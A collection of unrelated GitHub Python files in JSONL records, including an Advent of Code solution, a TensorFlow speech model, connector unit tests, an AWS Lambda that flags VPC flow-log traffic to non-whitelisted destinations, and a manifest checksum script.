+{"seq_id":"41806133947","text":"# Quality of life imports\nfrom pathlib import Path\nfrom sys import modules\nfrom functools import reduce\n\nimport math\nimport re\n\nimport itertools as it\nimport numpy as np\n\n\n# Quality of life, define the input file location\nsrc = Path(modules['__main__'].__file__).resolve().parent\ninput_file_path = Path(src, \"input.txt\")\n\nSIZE_CAP = 100\nKNOWN_OVERLAPS = {\n\n}\n\ndef convert_range(input_range: str) -> list:\n    spl = [list(map(int, x.split('..'))) for x in input_range]\n    return spl\n\ndef convert_abs_range(input_range: list) -> int:\n    return abs(input_range[0] - input_range[1])\n    \ndef calculate_change(input_coords: list) -> int:\n    return reduce(lambda x, y : x * y, input_coords)\n\n# Unpack input into something we can use\ninput_lines = []\nwith open(input_file_path) as f:\n    lines = [x.rstrip() for x in f.readlines()]\n    for x in lines:\n        try:\n\n            # Yes, we're unpacking all the ranges right now; I know I will need them in part 2, so whatever - I can discard them now\n            x_range, y_range, z_range = re.findall(r\"-?\\d+..-?\\d+\", x)\n            state = re.findall(r\"(on|off)\", x)\n            ranges = convert_range([x_range, y_range, z_range])\n            if all(abs(i) <= SIZE_CAP for i in 
np.array(ranges).flatten()):\n                input_lines.append([state[0], *ranges])\n\n        except ValueError as e:\n            print(e)\n\n\n# Basically the idea is to use axis aligned 3d \"bounding\" boxes\n# If all 3 ranges are overlapping then there is a collision\ndef check_overlap(current_range, current_idx, prev_elems):\n    def are_overlapping(current, suspected):\n        return current[1] >= suspected[0] and suspected[1] >= current[0]\n\n    def intersect_vol(current, suspected):\n        def axis_overlap(A, B):\n            return max(0, min(A[1], B[1]) - max(A[0], B[0])) \n        return axis_overlap(current[0], suspected[0]) * \\\n               axis_overlap(current[1], suspected[1]) * \\\n               axis_overlap(current[2], suspected[2])\n\n    # We need to check if the state is similar as well\n    \n    # What if the same region is overlapping\n\n    # If two on segments are overlapping we need to know by how much they overlap, and subtract that from the\n    # new amount we're adding to the total\n    \n    # If two off sections are overlapping we just need\n\n    for prev_idx, elem in list(prev_elems)[::-1]:\n        # elem[0] is the on/off state, elem[1:] are the x/y/z ranges\n        for axis_i, axis in enumerate(current_range[1:]):\n            if not are_overlapping(axis, elem[1 + axis_i]):\n                # This axis is disjoint, so the boxes cannot collide\n                break\n        else:\n            # All three axes overlap: record the collision\n            if current_idx not in KNOWN_OVERLAPS:\n                KNOWN_OVERLAPS[current_idx] = [prev_idx]\n            else:\n                KNOWN_OVERLAPS[current_idx].append(prev_idx)\n    \n\n# Skip copying elements into a new thing and use itertools' C-level iterators to do things faster\ndef skip_element(all_elements, idx):\n    return it.chain(it.islice(all_elements, 0, idx), it.islice(all_elements, idx+1, None))\n\n\ndef get_previous(all_elements, idx):\n    # yields (index, element) pairs for everything before idx\n    return enumerate(it.islice(all_elements, 0, idx))\n\nANY_OFF = False\nTOTAL_ON = 0\n\nfor idx, line in enumerate(input_lines):\n    state, x_range, y_range, z_range = line\n    x_size = convert_abs_range(x_range)\n    y_size = convert_abs_range(y_range)\n    z_size = convert_abs_range(z_range)\n\n    total_size = calculate_change([x_size, y_size, z_size])\n\n    if state == 'off':\n        ANY_OFF = True\n\n    if not ANY_OFF and state != 'off':\n        TOTAL_ON += total_size\n\n    if ANY_OFF:\n        previous_elem_iter = get_previous(input_lines, idx)\n        overlap = check_overlap(line, idx, previous_elem_iter)\n\n        # if state == 'off':\n        #     TOTAL_ON -= overlap\n        # else:\n        #     TOTAL_ON += overlap\n\nprint()\n","repo_name":"Vi-Robitaille/src-advent-of-code","sub_path":"src/python/2021/22/part1.py","file_name":"part1.py","file_ext":"py","file_size_in_byte":3674,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"10575527225","text":"import numpy as np\nimport tensorflow as tf\nimport os\nfrom tqdm import tqdm\nimport functools\nfrom SpeechDataUtils import SpeechDataUtils\nfrom SpeechDataUtils import SpeechDataSet\nfrom CLDNNConfig import CLDNNConfig\n\ndef define_scope(function):\n  attribute = '_cache_' + function.__name__\n\n  @property\n  @functools.wraps(function)\n  def decorator(self):\n    if not hasattr(self, attribute):\n      with tf.variable_scope(function.__name__):\n        setattr(self, attribute, function(self))\n    return getattr(self, attribute)\n\n  return decorator\n\nclass CLDNNModel:\n  def __init__(self, config : CLDNNConfig):\n    self.config = config\n\n    self.init_placeholders()\n    \n    self.input_size = int(self.config.max_timesteps)\n    self.output_size = int(self.config.max_output_length)\n\n    print(\"Inference : \", self.inference)\n    print(\"Loss : \", self.loss)\n    print(\"Training : \", self.training)\n    print(\"Evaluation : \", self.evaluation)\n\n  def init_placeholders(self):\n    self.input_placeholder = tf.placeholder(tf.float32, [None, self.config.max_timesteps, 
self.config.mfcc_features_count], name=\"input__placeholder\")\n self.input_lengths_placeholder = tf.placeholder(tf.int32, [None], name=\"input_lengths_placeholder\")\n\n self.sparse_output_placeholder = tf.sparse_placeholder(tf.int32, name=\"sparse_true_output_placeholder\")\n self.output_placeholder = tf.placeholder(tf.int32, shape=[None, self.config.max_output_length, self.config.dictionary_size], name=\"true_output_placeholder\")\n self.output_lengths_placeholder = tf.placeholder(tf.int32, [None], name=\"output_lengths_placeholder\")\n\n self.learning_rate_placeholder = tf.placeholder(tf.float32, [], name=\"learning_rate\")\n\n @define_scope\n def inference(self):\n input_as_2d_tensor = tf.reshape(self.input_placeholder, [-1, self.config.max_timesteps, self.config.mfcc_features_count, 1])\n\n # 1st Layer (Convolution)\n ## Weights & Bias\n with tf.name_scope(\"Convolution\"):\n weights_conv_layer = CLDNNModel.weight_variable([self.config.conv_kernel_size, self.config.conv_kernel_size, 1, self.config.conv_features_count])\n bias_conv_layer = CLDNNModel.bias_variable([self.config.conv_features_count])\n ## Result\n conv_layer = CLDNNModel.conv2d(input_as_2d_tensor, weights_conv_layer) + bias_conv_layer\n relu_conv_layer = tf.nn.relu(conv_layer)\n\n # 2nd Layer (Max Pooling)\n with tf.name_scope(\"Max_pooling\"):\n max_pool_layer = CLDNNModel.max_pool_1xN(relu_conv_layer, self.config.max_pooling_size)\n\n # 3rd Layer (Dimension reduction)\n ## Flattening (from 2D to 1D)\n with tf.name_scope(\"Dim_reduction\"):\n convoluted_size = int(self.config.max_timesteps) * int(self.config.mfcc_features_count / self.config.max_pooling_size)\n flatten_size = convoluted_size * self.config.conv_features_count\n #flatten_size = int(convoluted_size * self.conv_features_count / self.config.max_timesteps)\n max_pool_layer_flatten = tf.reshape(max_pool_layer, [-1, flatten_size], name=\"Flatten_maxpool\")\n ## Weights and Bias\n time_red_size = int(self.config.max_timesteps / self.config.time_reduction_factor)\n dim_red_size = time_red_size * self.config.dimension_reduction_output_size\n weights_dim_red_layer = CLDNNModel.weight_variable([flatten_size, dim_red_size])\n bias_dim_red_layer = CLDNNModel.bias_variable([dim_red_size])\n ## Result\n dim_red_layer = tf.matmul(max_pool_layer_flatten, weights_dim_red_layer) + bias_dim_red_layer\n\n # Input reduction (for memory issues :( )\n with tf.name_scope(\"Input_reduction\"):\n flatten_input_size = self.config.max_timesteps * self.config.mfcc_features_count\n flatten_input_size_red = int(flatten_input_size / self.config.time_reduction_factor)\n flatten_input = tf.reshape(self.input_placeholder, [-1, flatten_input_size], name=\"flatten_input\")\n \n weights = CLDNNModel.weight_variable([flatten_input_size, flatten_input_size_red])\n biaises = CLDNNModel.bias_variable([flatten_input_size_red])\n\n red_input = tf.matmul(flatten_input, weights) + biaises\n red_time = tf.cast(tf.ceil(self.input_lengths_placeholder / self.config.time_reduction_factor), tf.int32)\n\n # 4th Layer (Concatenation)\n with tf.name_scope(\"Concatenation\"):\n concatenation_layer = tf.concat(1, [dim_red_layer, red_input])\n concatenation_layer_reshaped = tf.reshape(concatenation_layer, (-1, time_red_size, self.config.dimension_reduction_output_size + self.config.mfcc_features_count), name=\"reshape_timesteps_concat\")\n\n # 5th Layer (LSTM 1)\n with tf.name_scope(\"LSTM1\"):\n with tf.variable_scope(\"LSTMCell1\"):\n lstm_cell = tf.nn.rnn_cell.LSTMCell(self.config.lstm1_hidden_units_count)\n 
lstm1_output, lstm_state = tf.nn.dynamic_rnn(lstm_cell, concatenation_layer_reshaped, dtype=tf.float32, sequence_length = red_time)\n\n    # 6th Layer (LSTM 2)\n    with tf.name_scope(\"LSTM2\"):\n      with tf.variable_scope(\"LSTMCell2\"):\n        lstm_cell = tf.nn.rnn_cell.LSTMCell(self.config.lstm2_hidden_units_count)\n        lstm2_output, lstm_state = tf.nn.dynamic_rnn(lstm_cell, lstm1_output, dtype=tf.float32)\n\n    lstm2_output_shape = lstm2_output.get_shape()\n    lstm2_output_shape = [-1, int(lstm2_output_shape[1] * lstm2_output_shape[2])]\n    lstm2_output_reshaped = tf.reshape(lstm2_output, lstm2_output_shape)\n\n    # 7th Layer (Fully connected 1)\n    with tf.name_scope(\"Fully_connected1\"):\n      weights = CLDNNModel.weight_variable([lstm2_output_shape[1], self.config.fully_connected1_size])\n      biases = CLDNNModel.bias_variable([self.config.fully_connected1_size])\n\n      fully_connected_layer1 = tf.matmul(lstm2_output_reshaped, weights) + biases\n\n    # 8th Layer (Fully connected 2)\n    with tf.name_scope(\"Fully_connected2\"):\n      weights = CLDNNModel.weight_variable([self.config.fully_connected1_size, self.output_size * self.config.dictionary_size])\n      biases = CLDNNModel.bias_variable([self.output_size * self.config.dictionary_size])\n\n      fully_connected_layer2 = tf.matmul(fully_connected_layer1, weights) + biases\n\n    logits = tf.reshape(fully_connected_layer2, [-1, self.output_size, self.config.dictionary_size])\n    \n    return logits # Should be the final layer's output\n\n  @define_scope\n  def loss(self):\n    if self.config.use_ctc_loss:\n      inference_time_major = tf.transpose(self.inference, [1, 0, 2])\n      ctc = tf.nn.ctc_loss(inference_time_major, self.sparse_output_placeholder, self.output_lengths_placeholder, time_major = True, ctc_merge_repeated=False)\n      return tf.reduce_mean(ctc)\n    else:\n      cross_entropy = tf.nn.softmax_cross_entropy_with_logits(self.inference, self.output_placeholder)\n      return tf.reduce_mean(cross_entropy)\n\n  @define_scope\n  def training(self):\n    tf.summary.scalar('loss', self.loss)\n\n    #optimizer = tf.train.GradientDescentOptimizer(self.config.learning_rate)\n    optimizer = tf.train.MomentumOptimizer(self.learning_rate_placeholder, 0.9)\n\n    global_step = tf.Variable(0, name='global_step', trainable=False)\n\n    train_op = optimizer.minimize(self.loss, global_step = global_step)\n\n    return train_op\n  \n  @define_scope\n  def evaluation(self):\n    correct_prediction = tf.equal(tf.argmax(self.inference, 2), tf.argmax(self.output_placeholder, 2))\n    return tf.cast(correct_prediction, tf.float32)\n  \n  @staticmethod\n  def conv2d(inputTensor, weights):\n    return tf.nn.conv2d(inputTensor, weights, strides=[1, 1, 1, 1], padding='SAME')\n\n  @staticmethod\n  def max_pool_1xN(inputTensor, max_pooling_size):\n    return tf.nn.max_pool(inputTensor, ksize=[1, 1, max_pooling_size, 1], strides=[1, 1, max_pooling_size, 1], padding='SAME')\n\n  @staticmethod\n  def init_variable(shape, init_method='uniform', xavier_params = (None, None)):\n    if init_method == 'zeros':\n      return tf.Variable(tf.zeros(shape, dtype=tf.float32))\n    elif init_method == 'uniform':\n      return tf.Variable(tf.random_normal(shape, stddev=0.01, dtype=tf.float32))\n    else: #xavier\n      (fan_in, fan_out) = xavier_params\n      low = -4*np.sqrt(6.0/(fan_in + fan_out)) # {sigmoid:4, tanh:1} \n      high = 4*np.sqrt(6.0/(fan_in + fan_out))\n      return tf.Variable(tf.random_uniform(shape, minval=low, maxval=high, dtype=tf.float32))\n    # A Gaussian initializer is still needed (for the LSTM)\n\n  @staticmethod\n  def weight_variable(shape, init_method='uniform', xavier_params = (None, None)):\n    return 
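# The init_variable() helper above computes uniform Xavier/Glorot bounds as
# ±gain*sqrt(6/(fan_in+fan_out)), where the gain of 4 is the sigmoid factor
# from its comment ({sigmoid:4, tanh:1}). The same arithmetic in plain numpy,
# with made-up fan sizes:
import numpy as np

def xavier_bounds(fan_in, fan_out, gain=4.0):
    limit = gain * np.sqrt(6.0 / (fan_in + fan_out))
    return -limit, limit

low, high = xavier_bounds(256, 128)
print(low, high)  # the symmetric interval the uniform init samples from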
CLDNNModel.init_variable(shape, init_method, xavier_params)\n\n @staticmethod\n def bias_variable(shape, init_method='uniform', xavier_params = (None, None)):\n return CLDNNModel.init_variable(shape, init_method, xavier_params)","repo_name":"Zelgunn/Immersive-AI","sub_path":"CLDNN/CLDNN/CLDNNModel.py","file_name":"CLDNNModel.py","file_ext":"py","file_size_in_byte":8619,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"78"} +{"seq_id":"17706582729","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nfrom base import Problem\n\n\nclass Solution(Problem):\n\n def solve(self, input_):\n a = 1\n b = 1\n count = 2\n while len(str(b)) < input_:\n a, b = b, a + b\n count += 1\n\n print('Solve problem {}'.format(self.number))\n print(count)\n\n\nif __name__ == '__main__':\n solution = Solution(25)\n solution.solve(1000)\n","repo_name":"phapdv/project_euler","sub_path":"pe25.py","file_name":"pe25.py","file_ext":"py","file_size_in_byte":421,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"74440761532","text":"import unittest\nfrom unittest.mock import Mock, patch\nfrom connector import Connector\nimport connector\n\n\nclass TestApp(unittest.TestCase):\n\n def setUp(self):\n with patch('connector.create_engine') as mocked_engine:\n with patch('connector.MetaData') as mocked_metadata:\n with patch('connector.Table') as mocked_table:\n mocked_table.return_value.columns = [\n \"Table\", 'name', 'somethingelse']\n self.inst = Connector(\n 'somedb', 'sometable', 'someesindex', 'somedb_type')\n\n def test_connector_instance_creation(self):\n self.assertEqual(self.inst.elastic_index, 'someesindex')\n self.assertEqual(self.inst.elastic_doc_type, 'somedb_type')\n\n def test_connector_instance_creation_with_wrong_table_name_negative(self):\n with patch('connector.create_engine') as mocked_engine:\n with patch('connector.MetaData') as mocked_metadata:\n with patch('connector.Table') as mocked_table:\n with self.assertRaises(TypeError) as raised_exception:\n inst = Connector(\n 'somedb', 3, 'someesindex', 'somedb_type')\n self.assertEqual(raised_exception.exception.args[0],\n 'table must be str')\n\n def test_connector_instance_creation_with_wrong_database_name_negative(\n self):\n with patch('connector.create_engine') as mocked_engine:\n with patch('connector.MetaData') as mocked_metadata:\n with patch('connector.Table') as mocked_table:\n with self.assertRaises(TypeError) as raised_exception:\n inst = Connector(\n (1, 2, 3), 'sad', 'someesindex', 'somedb_type')\n self.assertEqual(raised_exception.exception.args[0],\n 'database must be str')\n\n def test_connector_instance_creation_with_wrong_elastic_index_negative(\n self):\n with patch('connector.create_engine') as mocked_engine:\n with patch('connector.MetaData') as mocked_metadata:\n with patch('connector.Table') as mocked_table:\n with self.assertRaises(TypeError) as raised_exception:\n inst = Connector('dsa', 'sad', 523, 'somedb_type')\n self.assertEqual(raised_exception.exception.args[0],\n 'elastic_index must be str')\n\n def test_connector_instance_creation_with_wrong_elastic_doc_type_negative(\n self):\n with patch('connector.create_engine') as mocked_engine:\n with patch('connector.MetaData') as mocked_metadata:\n with patch('connector.Table') as mocked_table:\n with self.assertRaises(TypeError) as raised_exception:\n inst = Connector(\"sad\", 'sad', 'someesindex', 0000)\n self.assertEqual(raised_exception.exception.args[0],\n 
'elastic_doc_type must be str')\n\n def test_connector_instance_creation_without_connection_to_database_wrong(\n self):\n with self.assertRaises(connector.DatabaseConnectionError) as raised_exception:\n inst = Connector(\"sad\", 'sad', 'someesindex', 'sda')\n self.assertEqual(\n raised_exception.exception.args[0],\n 'Connection to databes has failed')\n\n def test_connector_headers_property(self):\n self.assertEqual(self.inst.headers, (\"Table\", 'name', 'somethingelse'))\n\n def test_get_json_from_row(self):\n head = Mock()\n head.name = 'sad'\n with patch('connector.create_engine') as mocked_engine:\n with patch('connector.MetaData') as mocked_metadata:\n with patch('connector.Table') as mocked_table:\n mocked_table.return_value.columns = [head]\n inst = Connector(\"sad\", 'sad', 'someesindex', 'sda')\n self.assertEqual(inst.get_json_from_row(['Table']), {'sad': 'Table', })\n\n def test_delete_index(self):\n with patch('connector.Connector.es.indices.delete') as mock_es:\n mock_es.return_value.indices.delete = 'sa'\n self.assertEqual(None, self.inst.delete_index())\n\n def test_delete_index_negative(self):\n mock = Mock(side_effect=connector.ElasticConnectionError)\n with self.assertRaises(connector.ElasticConnectionError) as raise_exception:\n with patch('connector.Connector.es') as mock_es:\n mock_es.return_value.indices.delete = mock()\n self.inst.delete_index()\n\n def test_primary_key(self):\n with patch('connector.create_engine') as mocked_engine:\n with patch('connector.MetaData') as mocked_metadata:\n with patch('connector.Table') as mocked_table:\n mocked_table.return_value.primary_key.columns.values()[\n 0].name = 'id'\n inst = Connector(\n 'somedb', 'sometable', 'someesindex', 'somedb_type')\n self.assertEqual(inst.primary_key, 'id')\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"cdeler/woogle","sub_path":"wiki_indexer/test_app.py","file_name":"test_app.py","file_ext":"py","file_size_in_byte":5182,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"1856451682","text":"# -*- coding: utf-8 -*-\nimport os\nimport time\nimport socket\nimport urllib.parse\nimport urllib.request\nimport urllib.error\nimport csv\nimport gzip\nimport ipaddress\nimport json\nimport logging\nimport boto3\n\nlogger = logging.getLogger()\nlogger.setLevel(logging.WARNING)\n\ns3 = boto3.client('s3')\nssm = boto3.client('ssm')\nlogs = boto3.client('logs')\n\n# environment variable\nLOGS_GROUP_NAME = os.environ['LOGS_GROUP_NAME']\nLOGS_STREAM_NAME = os.environ['LOGS_STREAM_NAME']\n\n# local cidr\n# VPC_CIDR = [\n# '10.0.0.0/8',\n# '172.16.0.0/12',\n# '192.168.0.0/16',\n# '198.19.0.0/16']\nVPC_CIDR = [\n '10.254.240.0/24',\n '10.254.241.0/26',\n '10.254.242.0/26']\n\nAWS_IP_RANGE_URL = 'https://ip-ranges.amazonaws.com/ip-ranges.json'\n\n\n# ----------------------------------------------------------------------\n# AWS IP Range\n# ----------------------------------------------------------------------\ndef get_aws_cidr():\n try:\n with urllib.request.urlopen(AWS_IP_RANGE_URL) as res:\n body = res.read().decode('utf-8')\n cidr = json.loads(body)\n return cidr\n except urllib.error.URLError as e:\n logger.info('Error: get_aws_ip_ranges() {}'.format(str(e)))\n return {}\n\n\ndef extract_aws_ip_range(cidr):\n regions = ['ap-northeast-1', 'us-east-1']\n cidr_list = [_range.get('ip_prefix') for _range in cidr.get('prefixes')\n if _range.get('region') in regions]\n return cidr_list\n\n\ncidr = get_aws_cidr()\nAWS_CIDR = 
set(extract_aws_ip_range(cidr))\nAWS_CIDR = sorted(AWS_CIDR)\n\n\ndef in_white_list_cidr():\n response = ssm.get_parameter(Name='whitelist_cidr_v1')\n white_list = response.get('Parameter').get('Value').split(',')\n return white_list\n\nWHITE_LIST_CIDR = in_white_list_cidr()\n\n\ndef reverse_lookup(ip):\n try:\n return socket.gethostbyaddr(ip)[0]\n except socket.herror as e:\n # logger.error(e)\n logger.info('illegal.domain: gethostbyaddr() {}'.format(str(e)))\n return 'illegal.domain'\n\n\ndef in_local_cidr(ip_addr):\n\n cidr_list = VPC_CIDR + AWS_CIDR + WHITE_LIST_CIDR\n try:\n ip = ipaddress.ip_address(ip_addr)\n except ValueError:\n # for example. ipaddr: '-'\n return True\n\n for cidr in cidr_list:\n nw = ipaddress.ip_network(cidr)\n if ip in nw:\n logger.info('ip: {} in local cidr: {}'.format(ip_addr, cidr))\n return True\n else:\n logger.info('ip: {} not in local cidr: {}'.format(ip_addr, cidr))\n continue\n\n return False\n\n\ndef in_white_list_domain(domain):\n response = ssm.get_parameter(Name='whitelist_for_external_domain_v1')\n white_list = response.get('Parameter').get('Value').split(',')\n logger.info('whitelist: {}'.format(white_list))\n logger.info('whitelist type: {}'.format(type(white_list)))\n\n for white in white_list:\n if domain.endswith(white):\n return True\n else:\n continue\n return False\n\n\ndef put_log_events(message):\n\n # events format\n events = [\n dict([('timestamp', int(time.time())*1000), ('message', message)])\n ]\n\n response = logs.describe_log_streams(\n logGroupName=LOGS_GROUP_NAME,\n logStreamNamePrefix=LOGS_STREAM_NAME)\n\n logger.info('describe_log_streams: {}'.format(response))\n\n stream = response['logStreams'][0]\n sequence_token = stream.get('uploadSequenceToken')\n\n if sequence_token:\n logs.put_log_events(\n logGroupName=LOGS_GROUP_NAME,\n logStreamName=LOGS_STREAM_NAME,\n logEvents=events,\n sequenceToken=sequence_token\n )\n else:\n logs.put_log_events(\n logGroupName=LOGS_GROUP_NAME,\n logStreamName=LOGS_STREAM_NAME,\n logEvents=events\n )\n logger.info('logs.put_log_event: {}'.format(events))\n\n\ndef message_format(messages):\n # '@@' is a message separator for message text.\n # This separator process is executed by this function.\n # ./alarm_lambda/lambda_function()\n return '@@'.join(messages)\n\n\ndef check_domain(dest, line):\n\n domain = reverse_lookup(dest)\n logger.info('domain: {}'.format(domain))\n\n if in_white_list_domain(domain):\n logger.info('no problem domain: {} <- ip: {}'.format(domain, dest))\n else:\n # alarm\n logger.warning('Alarm domain: {} <- ip: {}'.format(domain, dest))\n message = 'Alarm domain: {}, ip-address: {}'.format(domain, dest)\n log_line = json.dumps(line)\n _message = message_format([message, log_line])\n put_log_events(_message)\n\n\ndef vpc_flow_log_object(event):\n bucket = event['Records'][0]['s3']['bucket']['name']\n key = urllib.parse.unquote_plus(\n event['Records'][0]['s3']['object']['key'], encoding='utf-8')\n logger.info('key: {}'.format(key))\n return bucket, key\n\n\ndef lambda_handler(event, context):\n logger.info('event: {}'.format(event))\n\n bucket, key = vpc_flow_log_object(event)\n try:\n s3.download_file(bucket, key, '/tmp/file.csv.gz')\n\n with gzip.open('/tmp/file.csv.gz', 'rt') as csv_file:\n f = csv.DictReader(csv_file, delimiter=' ')\n for line in f:\n dest = line.get('dstaddr')\n logger.info('dest ip: {}'.format(dest))\n\n if not in_local_cidr(dest):\n check_domain(dest, line)\n\n except Exception as e:\n logger.error(e)\n raise 
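# The in_local_cidr() check above boils down to "is this address inside any
# of these networks". A compact standalone version with the same ipaddress
# calls; the sample CIDR echoes the VPC_CIDR list in the record.
import ipaddress

def in_any_cidr(ip_addr, cidrs):
    try:
        ip = ipaddress.ip_address(ip_addr)
    except ValueError:      # e.g. a '-' placeholder in a flow log line
        return True
    return any(ip in ipaddress.ip_network(c) for c in cidrs)

print(in_any_cidr("10.254.240.17", ["10.254.240.0/24"]))  # True
print(in_any_cidr("8.8.8.8", ["10.254.240.0/24"]))        # False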
e\n","repo_name":"rafty/NotifyUnexpectedAddress","sub_path":"lambda/lambda_function.py","file_name":"lambda_function.py","file_ext":"py","file_size_in_byte":5435,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"36836977719","text":"\"\"\"empty message\n\nRevision ID: 44e142d6ce2a\nRevises: \nCreate Date: 2019-01-05 17:42:54.956500\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\nfrom sqlalchemy.dialects import postgresql\n\n# revision identifiers, used by Alembic.\nrevision = '44e142d6ce2a'\ndown_revision = None\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.create_table('order',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('status', sa.String(), nullable=True),\n sa.Column('total', sa.Integer(), nullable=True),\n sa.Column('items', postgresql.JSON(astext_type=sa.Text()), nullable=True),\n sa.PrimaryKeyConstraint('id')\n )\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_table('order')\n # ### end Alembic commands ###\n","repo_name":"william-ek/Python-Order-Server","sub_path":"migrations/versions/44e142d6ce2a_.py","file_name":"44e142d6ce2a_.py","file_ext":"py","file_size_in_byte":887,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"25781403270","text":"#GENERATORS ARE ITERATORS............\n\n#memory ---------- [---------------] ......list [save in memory]\n#memory ---------- [----].......generators[at a time one] memory space reduce and perforamnce is better\n# import time\n# t1 =time.time()\n# def nums(n):\n# for i in range(1,n+1):\n# yield i\n# temp = nums(10)\n# for i in temp:\n# print(i)\n# t2 =time.time()\n# print((t2-t1))\n\ndef even_no(n):\n for i in range(2,n+1,2):\n yield i\n \ntemp_e=even_no(5)\nfor i in temp_e: # if i write for i in even_no(4): then two time loop execute....\n print(i)\n\n\n ","repo_name":"Umang070/Python_Programs","sub_path":"generators.py","file_name":"generators.py","file_ext":"py","file_size_in_byte":580,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"16015051614","text":"import Jetson.GPIO as GPIO\nimport time\n\nfrom PyQt5.QtCore import *\n\nGPIO.setwarnings(False)\nGPIO.setmode(GPIO.BCM) \n\nGPIO.setup(4, GPIO.OUT) # Set GPIO pin 19 to output mode.\nGPIO.output(4, True) \n\nclass Laser_run(QThread):\n\n def __init__(self):\n super().__init__()\n\n def run(self):\n \n while True:\n\n # Laser usage time data\n\n f = open(\"Setting_Laser.txt\",'r')\n self.LaserHour1 = f.readline()\n self.LaserMin1 = f.readline()\n self.LaserSec1 = f.readline()\n\n self.LaserHour = float(self.LaserHour1)\n self.LaserMin = float(self.LaserMin1)\n self.LaserSec = float(self.LaserSec1)\n\n f.close()\n# print(\"1:\", \"%d\" %self.LaserHour, \"%d\" %self.LaserMin, \"%d\" %self.LaserSec)\n\n if self.LaserSec < 59:\n self.LaserSec += 1\n elif self.LaserSec == 59:\n self.LaserSec = 0\n if self.LaserMin < 59:\n self.LaserMin += 1\n elif self.LaserMin == 59:\n self.LaserMin = 0\n self.LaserHour += 1\n\n# print(\"%d\" %self.LaserHour, \"%d\" %self.LaserMin, \"%d\" %self.LaserSec)\n\n f = open(\"Setting_Laser.txt\", 'w')\n\n f.write('%d\\n' %int(self.LaserHour))\n f.write('%d\\n' %int(self.LaserMin))\n f.write('%d\\n' %int(self.LaserSec))\n f.close()\n\n time.sleep(1)\n\n# 
print(\"%d\\n\"%self.LaserHour,\"%d\\n\"%self.LaserMin,\"%d\"%self.LaserSec)\n\n \n\n\n\n\n\n \n\n \n\n\n","repo_name":"HyungJae-Lim/Project1-Rapid-Urinary-Tract-Infection","sub_path":"Bacometer_Code/CODE/Laser_Run.py","file_name":"Laser_Run.py","file_ext":"py","file_size_in_byte":1585,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"39755038604","text":"import csv\nimport os\nimport subprocess\nimport argparse\nimport sys\n\ndef usage():\n print('check_manifest.py')\n\n\nif __name__ == '__main__':\n debug = False\n\n#manifest_file = \"{0}/{1}/foundry/manifest-{1}.csv\".format(os.environ[\"TAPEOUT_ROOT\"], os.environ[\"SHUTTLE\"])\nmanifest_file = sys.argv[1]\n\nwith open( manifest_file, \"r\" ) as f:\n reader = csv.reader(f, delimiter=\",\", skipinitialspace=True)\n for i, line in enumerate(reader):\n if i != 0 and line[2] != 'TEST':\n if os.path.splitext(line[10].split('>')[1])[1] == '.gz':\n # p3 = subprocess.Popen( \"gunzip -c\", stdin=subprocess.PIPE, stdout=subprocess.PIPE, shell=True )\n p2 = subprocess.Popen( \"gunzip -c | shasum\", stdin=subprocess.PIPE, stdout=subprocess.PIPE, shell=True )\n p1 = subprocess.Popen( line[10].split('>')[0], stdout=p2.stdin, stderr=subprocess.PIPE, shell=True )\n else:\n p2 = subprocess.Popen( \"shasum\", stdin=subprocess.PIPE, stdout=subprocess.PIPE, shell=True )\n p1 = subprocess.Popen( line[10].split('>')[0], stdout=p2.stdin, stderr=subprocess.PIPE, shell=True )\n stdout, stderr = p2.communicate()\n output = stdout.decode('utf-8')\n if output:\n hash = output.split(' ')[0]\n if hash == line[9]:\n check = '-- Matched-- '\n else:\n check = '** Error **'\n\n print(\"{:02}: slot = {}, project = {:<15}, id = {}, shasum = {} | {}\".format(i, line[1], line[2][:15], line[3][1:], line[9], check))\n\n\n\n\n\n\n","repo_name":"mithro/mpw-tools","sub_path":"efabless/check_manifest.py","file_name":"check_manifest.py","file_ext":"py","file_size_in_byte":1586,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"78"} +{"seq_id":"37260526219","text":"from __future__ import unicode_literals\nfrom __future__ import print_function\nfrom __future__ import division\nfrom __future__ import absolute_import\nfrom future import standard_library\nstandard_library.install_aliases()\nfrom builtins import next\nfrom builtins import str\nfrom builtins import *\nfrom builtins import object\nfrom __future__ import generators\n\n__doctype__ = \"restructuredtext en\"\n\nfrom clonedigger.logilab.common.compat import chain, imap\n\n# WARNING: internal imports order matters !\n\nfrom clonedigger.logilab.astng._exceptions import *\n\n\nclass InferenceContext(object):\n __slots__ = ('startingfrom', 'path', 'lookupname', 'callcontext', 'boundnode')\n \n def __init__(self, node=None, path=None):\n self.startingfrom = node # XXX useful ?\n if path is None:\n self.path = []\n else:\n self.path = path\n self.lookupname = None\n self.callcontext = None\n self.boundnode = None\n\n def push(self, node):\n name = self.lookupname\n if (node, name) in self.path:\n raise StopIteration()\n self.path.append( (node, name) )\n\n def pop(self):\n return self.path.pop()\n\n def clone(self):\n # XXX copy lookupname/callcontext ?\n clone = InferenceContext(self.startingfrom, self.path)\n clone.callcontext = self.callcontext\n clone.boundnode = self.boundnode\n return clone\n\n\ndef unpack_infer(stmt, context=None):\n \"\"\"return an iterator on nodes infered by the given statement\n if the infered value is 
